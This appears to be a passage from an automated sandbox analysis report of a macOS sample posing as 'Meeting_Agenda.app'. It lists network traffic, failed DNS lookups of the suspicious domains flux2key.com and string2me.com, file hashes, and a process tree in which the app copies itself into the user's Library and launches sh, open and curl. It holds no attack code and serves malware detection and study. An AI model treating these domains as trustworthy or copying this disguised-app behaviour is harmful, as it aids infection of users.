Dez 24, 2018 09:34:58.622513056 MEZ5524853192.168.0.508.8.8.8
Dez 24, 2018 09:34:59.259896994 MEZ5084353192.168.0.508.8.8.8
Dez 24, 2018 09:34:59.469114065 MEZ53508438.8.8.8192.168.0.50
Dez 24, 2018 09:34:59.469690084 MEZ5084353192.168.0.508.8.4.4
Dez 24, 2018 09:34:59.627952099 MEZ5524853192.168.0.508.8.8.8
Dez 24, 2018 09:34:59.679302931 MEZ53508438.8.4.4192.168.0.50
Dez 24, 2018 09:34:59.835935116 MEZ53552488.8.8.8192.168.0.50
Dez 24, 2018 09:34:59.836395979 MEZ5524853192.168.0.508.8.4.4
Dez 24, 2018 09:35:00.049880981 MEZ53552488.8.4.4192.168.0.50
Dez 24, 2018 09:35:20.063322067 MEZ4923680192.168.0.5017.253.55.204
Dez 24, 2018 09:35:20.074521065 MEZ804923617.253.55.204192.168.0.50
Dez 24, 2018 09:35:20.074728966 MEZ4923680192.168.0.5017.253.55.204

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Dez 24, 2018 09:34:58.404784918 MEZ5698153192.168.0.508.8.8.8
Dez 24, 2018 09:34:58.409457922 MEZ53569818.8.8.8192.168.0.50
Dez 24, 2018 09:34:58.622513056 MEZ5524853192.168.0.508.8.8.8
Dez 24, 2018 09:34:59.259896994 MEZ5084353192.168.0.508.8.8.8
Dez 24, 2018 09:34:59.469114065 MEZ53508438.8.8.8192.168.0.50
Dez 24, 2018 09:34:59.469690084 MEZ5084353192.168.0.508.8.4.4
Dez 24, 2018 09:34:59.627952099 MEZ5524853192.168.0.508.8.8.8
Dez 24, 2018 09:34:59.679302931 MEZ53508438.8.4.4192.168.0.50
Dez 24, 2018 09:34:59.835935116 MEZ53552488.8.8.8192.168.0.50
Dez 24, 2018 09:34:59.836395979 MEZ5524853192.168.0.508.8.4.4
Dez 24, 2018 09:35:00.049880981 MEZ53552488.8.4.4192.168.0.50

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Dez 24, 2018 09:34:58.622513056 MEZ192.168.0.508.8.8.80x47bbStandard query (0)flux2key.comA (IP address)IN (0x0001)
Dez 24, 2018 09:34:59.259896994 MEZ192.168.0.508.8.8.80x5aa1Standard query (0)string2me.comA (IP address)IN (0x0001)
Dez 24, 2018 09:34:59.469690084 MEZ192.168.0.508.8.4.40x5aa1Standard query (0)string2me.comA (IP address)IN (0x0001)
Dez 24, 2018 09:34:59.627952099 MEZ192.168.0.508.8.8.80x47bbStandard query (0)flux2key.comA (IP address)IN (0x0001)
Dez 24, 2018 09:34:59.836395979 MEZ192.168.0.508.8.4.40x47bbStandard query (0)flux2key.comA (IP address)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
Dez 24, 2018 09:34:59.469114065 MEZ8.8.8.8192.168.0.500x5aa1Server failure (2)string2me.comnonenoneA (IP address)IN (0x0001)
Dez 24, 2018 09:34:59.679302931 MEZ8.8.4.4192.168.0.500x5aa1Server failure (2)string2me.comnonenoneA (IP address)IN (0x0001)
Dez 24, 2018 09:34:59.835935116 MEZ8.8.8.8192.168.0.500x47bbServer failure (2)flux2key.comnonenoneA (IP address)IN (0x0001)
Dez 24, 2018 09:35:00.049880981 MEZ8.8.4.4192.168.0.500x47bbServer failure (2)flux2key.comnonenoneA (IP address)IN (0x0001)

System Behavior

Analysis Process: xpcproxy PID: 535 Parent PID: 1

General

Start time:09:34:56
Start date:24/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

Chronological Activities

Analysis Process: usrnode PID: 535 Parent PID: 1

General

Start time:09:34:56
Start date:24/12/2018
Path:/Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode
File size:109376 bytes
MD5 hash:c211dff0d9ecff416a1bf5a588ec2d5d

Chronological Activities

Analysis Process: sh PID: 536 Parent PID: 535

General

Start time:09:34:57
Start date:24/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: open PID: 536 Parent PID: 535

General

Start time:09:34:57
Start date:24/12/2018
Path:/usr/bin/open
File size:105952 bytes
MD5 hash:40ed6d8f35c9f20484b97582d296398f

Chronological Activities

Analysis Process: xpcproxy PID: 537 Parent PID: 1

General

Start time:09:34:57
Start date:24/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

Chronological Activities

Analysis Process: usrnode PID: 537 Parent PID: 1

General

Start time:09:34:57
Start date:24/12/2018
Path:/Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode
File size:109376 bytes
MD5 hash:c211dff0d9ecff416a1bf5a588ec2d5d

Chronological Activities

Analysis Process: curl PID: 538 Parent PID: 537

General

Start time:09:34:57
Start date:24/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

Chronological Activities